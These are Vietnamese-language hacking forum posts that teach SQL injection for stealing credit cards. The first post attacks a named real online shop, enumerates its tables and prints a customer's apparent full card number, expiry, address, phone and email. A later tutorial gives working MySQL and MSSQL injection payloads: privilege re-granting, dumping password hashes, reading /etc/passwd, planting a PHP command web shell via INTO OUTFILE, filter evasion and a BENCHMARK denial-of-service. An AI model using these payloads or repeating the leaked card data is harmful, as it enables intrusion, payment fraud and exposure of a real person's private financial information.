Quote:

ra tiep table dau tien la: COLLATIONS 
Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau 


https://www.185elgin.com/customer_te...chema.tables--


Quote:


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product
do the la ta da co table dau tien va cac cac tables cua site roi.

bay gio ta tien hanh tim table nao co chua cc nha :d

ta tien hanh querry lay tat ca cc tu table orders xem nhe'

truoc tien phai convert sang dang hex nhe

ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
convert orders ra cai nay 0x6F7264657273

https://www.185elgin.com/customer_te...0x6F7264657273


Quote:

orders_id

6
Click here to view all testimonials




Testimonial by 4
customers_id

6
Click here to view all testimonials




Testimonial by 4
customers_name

6
Click here to view all testimonials



...........................................

Xong roi day ta lay nhung info can thiet de get cc nao

https://www.185elgin.com/customer_te...+from+orders--



Quote:


8/American Express/Alexander Cassini/371382972132008/1207/2523 3rd street//Santa Monica/90405/California/United States/310-560-1803/acassini@aol.com/2005-10-20 12:27:23

hack shop bị deny SELECT

bình thường khi query

Quote:
convert(int,(select top 1 table_name from information_schema.tables))--[
bay ra lỗi
Quote:
Syntax error converting the nvarchar value 'table_name' to a column of data type int[/b]
nhưng nếu bay ra lỗi
Quote:
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.
thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.
thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Quote:
;use dataname grant keyword on tables to public
trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào

Quote:
;use vnc grant select on sysobjects to public--
hack xong ta lại deny mẹ cái select cho thằng vịt khác ko hack dc nữa

TUT hack php part2

Lỗi MySQL là một lỗi rất là thông dụng và nguy hiểm.Khác với các lỗi khác MySQL bị lỗi là cho người viết mã gây ra hay bị sai sót
Lỗi MySQL đem lại những lợi ích như thế nào?
Nó cho phép người sử dụng có thể khai thác dễ dàng vào các database.Nói rõ hơn nó cho ta thấy được những thông số có liên quan đến victim chứa lỗi.MySQL Inj có thể phá hủy tập tin hay cho phép các tập tin khác mà attacker chèn vào
Bây giờ chúng ta nhìn vào 1 số ví dụ về code php
<? php
...
$ id = $ _GET [ 'id'];
...
mysql_query ( "UNION SELECT nick FROM users WHERE id =". );..... $ id
?> 

Chúng ta cần lưu ý về phương thức lấy đoạn ma GET .Anh em hãy để ý kỹ về đoạn mã php ở trên.Chúng ta có thể thay đổi yêu cầu truy vấn dựa vào GET.Nếu nó không lọc phần [ 'id'] mà chúng ta truy vấn vào dữ liệu của victim thì có nghĩa là nó bị lỗi MySQL.
Làm sao mà biết chính xác là nó bị lỗi.Sau đấy là 1 ví dụ :


Code:
http://www.site.ru/index.php?page=1
Với 1 trang như thế ,để ta biết nó có bị dính lỗi hay ko thi ta cần thêm vào 1 ký tự như dấu '

+
Code:
http://www.site.ru/index.php?page=1
'

Và khi nó bị dính MySQL thì website sẽ gởi lại cho ta biết với 1 thông báo như sau:

+MySQL Error: mysql_query (.......) error expretion syntax ...

Câu nói ở đây có nghĩa là có 1 truy vấn đang bị lỗi về cấu trúc toán học hay thư mục.Và 99% đây là lỗi source.

Ngoài ra ta còn 1 phương các nữa là ta dùng phương thức toán học đơn giản như sau:

+
Code:
http://www.site.ru/index.php?page=2-1
Và nó trở về 1 thì 99% nó bị dính mysql.
Khi ta biết chính xác nó bị lỗi thì ta sẽ khai thác như sau.Chúng ta cần gởi 1 truy vấn sql đến victim nhưng chúng ta cần truy vấn với giá trĩ là null.Null ở đây là rỗng không có 1 giá trị xác thực.
Đây là 
+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null / *
or
Code:
http://www.site.ru/index.php?page=99999 union + + + select null, null / *
Chúng ta sẽ sử dụng lần lượt các câu truy vấn thông dụng như:
+union select null, null 
union select null, null, null 
union select null, null, null, null 

Lệnh union ở đây chính là lênh kết nối các bảng lại với nhau.Chúng ta cứ sử dụng cho đến khi biết 9 xác có bao nhiêu bảng dữ liệu nằm trong database

+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null, null, null, null, null / *
Sau khi đã xác định được bảng ta xét đến nó có bao nhiệu cột nằm trong bảng.Với câu lệnh sau sẽ giúp ta xác định:

+? id =- 1 + + by order +100 / *

Dĩ nhiên các cột không thể nào quá 100 cột được.Với cách thức này ta có thể nhanh chóng biết được bao nhiêu cột.Và có sai thì nó sẽ báo lổi.

Sau khi đã biết chính xác được có bao nhiêu cột thì ta sẽ thay thế các giá trị null mà hồi nãy ta truy vấn bằng các con số 9 xác như 1,2,3,..

+
Code:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / *
Sau đó ta sẽ lấy 1 số thông tin như user database...Và ta cần biết 9 xác nó nằm ở cột nào mới truy vấn và tìm

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
*Sau khi có được các thông tin thì ta cần làm những bước sau tùy vào ý thích của mỗi người

1-Lấy pass của thằng root(Nó là quan trọng 1 mà)
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
Và nó sẽ cho ra pass là pass hash và chúng ta dùng các chương trình crack pass để lấy mã.Ví dụ như chương trình password pro.Lưu ý phương thức lấy pass bằng câu lệnh trên ko có nghĩa lúc nào cũng cho ra pass mà còn phụ thuộc vào thằng mysql.user có chấp nhận yêu cầu của ta hay ko.

2-Đọc các bảng khác có liên quan đến thằng root:
Chúng ta có thể đọc các bảng có liên quan như:spreadsheet-type users, reg_users, admins, accounts ...


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, name, passwd, 4,5,6 + + from users / *
3-Đọc tập tin chứ trên server:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
Nếu chúng ta xác định 9 xác tập tin ta cần đọc thì phần LOAD_FILE sẽ giúp ích cho ta rất nhiều.

4-Up shell và ddos:
Chúng ta cần nhận thấy là chúng ta cần nên đưa con shell ở bên ngoài vào sao cho phù hợp 1.Và thư mục mà ta cần quan tâm và phù hợp 1 chính là "/ home / site / public_html /"

Code up shell:

+http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *

Việc up shell là phần quan trọng 1 đối với lỗi MYSQL.Và 1 điều quan trọng ko kém là chúng ta cần đưa thêm biến hay tham số ,cụ thể là số.Nó sẽ giúp ta thực hiện được 1 số lệnh bị giới hạn trong mysql.
Ví dụ:union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
Chúng sẽ thử lại 3 lần với cột số 5

Đôi khi chúng ta gặp phải 1 số cơ chế lọc hay mã hóa trong mysql.Chính vì vậy để giải quyết vấn đề loại bỏ cơ chế trên ta cần 1 câu lệnh ko kém phần quan trọng


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
1 điều cần lưu ý là khi bộ lọc kovychku của sql được bật thì chúng ta có thể dùng đến phần LOAD_FILE
Ví dụ ta đưa vào LOAD_FILE phần đọc thư mục / etc / passwd thì chúng ta dùng đoạn code sau:

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
Đôi khi ta bị thằng inektsiya giới hạn việc sử dụng các khoản không gian sử dụng.Để xác lập lại ta dùng các lệnh sau:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
same

Code:
http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user,
Phần cuối là dos:Chắc câu lệnh này mọi người ai cũng hiểu ha:
+
Code:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))

 
Design by mkha.hero